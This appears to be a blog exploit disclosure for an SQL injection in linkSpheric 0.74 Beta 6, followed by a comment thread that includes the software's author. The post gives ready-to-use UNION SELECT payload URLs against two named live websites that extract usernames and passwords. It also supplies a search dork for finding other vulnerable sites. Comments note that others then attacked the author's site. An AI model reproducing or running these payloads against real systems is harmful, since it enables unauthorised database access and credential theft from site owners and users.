LFI to RCE via access_log injection

linkSpheric 0.74 Beta 6 SQL Injection Vuln


[o] linkSpheric 0.74 Beta 6 SQL Injection Vulnerability
Software : linkSpheric version 0.74 Beta 6
Vendor : http://dataspheric.com/
Download : http://sourceforge.net/projects/linkspheric/
Author : NoGe

[o] Vulnerable file
viewListing.php

[o] Exploit
http://localhost/[path]/viewListing.php?listID=[SQL]

[o] Proof of concept
http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--

[o] Dork
"Powered by linkSpheric"

Comments

Anonymous said…
Hello!

I represent the group of friends who wrote linkSpheric. LOL!!

It might seem that you have successfully penetrated this database. I think this is an important consideration for users of linkSpheric software because it was originally designed around php3 and has not been an active project for some years.

However, because linkSpheric is directory software, in other words, the information contained in a linkSpheric directory is intended to be public, I do not consider this to be a big deal.

I congratulate the hacker. And if you have seen Viper, tell him I send my regards and best wishes.
evilc0de said…
hello too..

im looking for bug
and your script is buggy
so i post it up
i dont change any databases

btw, who is Viper??
i dont know him.
Anonymous said…
You are correct. linkSpheric was never completed. This is why we decided to give it away for free :)

I know you did not harm the database. But I think you were able to execute a script. One of the records you found contains the name of my friend Viper. I thought it is possible that you are Viper playing a joke on me.

We no longer work on linkSpheric. If you want to, you can repair this vulnerability and you will get full credit. You will find the source code here:

http://sourceforge.net/projects/linkspheric/

Because linkSpheric is used by so many people in many different countries, I think it is possible that many people will thank you if you fix this vulnerability.

I hope you have a good weekend.
Jack said…
its just take 2 minutes to patch it :) believe me
Vrs-hCk said…
68: $result = mysql_query("SELECT * FROM listings WHERE id = '$listID' ");

Try to fix viewListing.php with this line :)
Anonymous said…
i think you should take responsibility. it is good to be a hacker, but you can be more professional.

i can tell my programmer to fix the code or you can do. it.

i think you deserve the credit. i think this will be good for you.

do you want a job?
Anonymous said…
friend, now everybody is hacking me. what have you done to me?
Anonymous said…
lols. ok. i thought you were attacking me because i am muslim. no problem.

you must understand that i am old and retired. i am not a young man. i use all the money i get now to feed my kids. so you are smart and young. i have no desire to fight with you.

but i also appreciate your sense of humor.

can i bless you?

May God, Allah, bless you and keep you
May Allah make His face to shine upon you. May Allah give you increase, both you and your children so that you may dwell in the house of Allah forever. So that you will be happy.

Bless you hacker. you are a good hacker.
Jack said…
woooyoooo ^^
feel the sensation.

Ge, take the code, patch, and re-publish. full credits eh?

stupid code